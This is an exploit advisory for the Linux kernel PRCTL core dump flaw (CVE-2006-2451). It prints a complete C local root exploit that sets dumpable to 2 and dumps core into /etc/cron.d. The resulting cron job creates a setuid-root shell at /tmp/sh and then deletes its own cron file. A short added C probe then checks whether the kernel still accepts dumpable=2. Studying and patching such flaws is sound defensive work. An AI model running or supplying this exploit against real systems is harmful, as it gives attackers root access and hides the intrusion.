Linux Kernel 2.6.x PRCTL Core Dump Handling (Exploit)

Summary

Improper handling of the process "dumpable" flag during core dump creation allows local attackers to gain root privileges in Linux, enabling them to execute arbitrary programs as root.

Credit:

The information has been provided by Red Hat.
The original article can be found at: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=195902


Details

Vulnerable Systems:
 * Linux Kernel 2.6.17.4 and prior
 * Linux Kernel 2.6.16.24 and prior

Exploit:
/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)            */
/* By:                                               */
/* - dreyer <luna at aditel.org> (main PoC code)     */
/* - RoMaNSoFt <roman at rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/prctl.h>      /* prctl() prototype and PR_SET_DUMPABLE */
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

/* Crontab fragment kept in the child's memory so that it ends up inside
 * the core file written to /etc/cron.d. */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    /* Make sure a core file may be written at all. */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        /* Child: on an affected kernel, dumpable=2 makes the core file be
         * written as root into the current directory. */
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    /* Parent: force the child to dump core. */
    kill(child, SIGSEGV);

    printf("[*] Sleeping for approx. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");
    return 0;
}

/* EoF */
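As an added example that is not part of the advisory or of the exploit above, the following C program checks whether a running kernel still accepts prctl(PR_SET_DUMPABLE, 2), the primitive the exploit depends on; the fix for CVE-2006-2451 limited the accepted values to 0 and 1, so a fixed kernel answers EINVAL. The names classify_dumpable2 and probe_dumpable2 are this example's own.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/prctl.h>

/* Added check, not part of the advisory: does this kernel still accept
 * prctl(PR_SET_DUMPABLE, 2)? The fix for CVE-2006-2451 limited the value
 * to 0 or 1, so EINVAL means the kernel is outside the affected range. */
enum dumpable2_status {
    DUMPABLE2_REJECTED = 0,     /* EINVAL: fixed kernel */
    DUMPABLE2_ACCEPTED = 1,     /* prctl succeeded: affected kernel */
    DUMPABLE2_INDETERMINATE = 2 /* other error, e.g. prctl filtered */
};

/* Classify a prctl() result; kept separate so it can be tested without
 * depending on the kernel the check runs on. */
enum dumpable2_status classify_dumpable2(int rc, int err)
{
    if (rc == 0)
        return DUMPABLE2_ACCEPTED;
    if (rc == -1 && err == EINVAL)
        return DUMPABLE2_REJECTED;
    return DUMPABLE2_INDETERMINATE;
}

/* Attempt dumpable=2 on the current process and restore the original
 * flag afterwards, so the check itself leaves no changed state behind. */
enum dumpable2_status probe_dumpable2(void)
{
    int original = prctl(PR_GET_DUMPABLE, 0, 0, 0, 0);
    int rc = prctl(PR_SET_DUMPABLE, 2, 0, 0, 0);
    int err = errno;
    enum dumpable2_status st = classify_dumpable2(rc, err);

    if (original >= 0)
        prctl(PR_SET_DUMPABLE, original, 0, 0, 0);
    return st;
}

int main(void)
{
    static const char *msg[] = {
        "kernel rejects dumpable=2 (EINVAL): not affected by CVE-2006-2451",
        "kernel accepts dumpable=2: affected kernel, update it",
        "prctl(PR_SET_DUMPABLE, 2) failed for another reason: inconclusive",
    };
    enum dumpable2_status st = probe_dumpable2();
    printf("%s\n", msg[st]);
    return st == DUMPABLE2_REJECTED ? 0 : 1;
}
```

Exit status 0 means the kernel rejects the value; any other status should be treated as a finding to follow up on.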

Categories: Exploits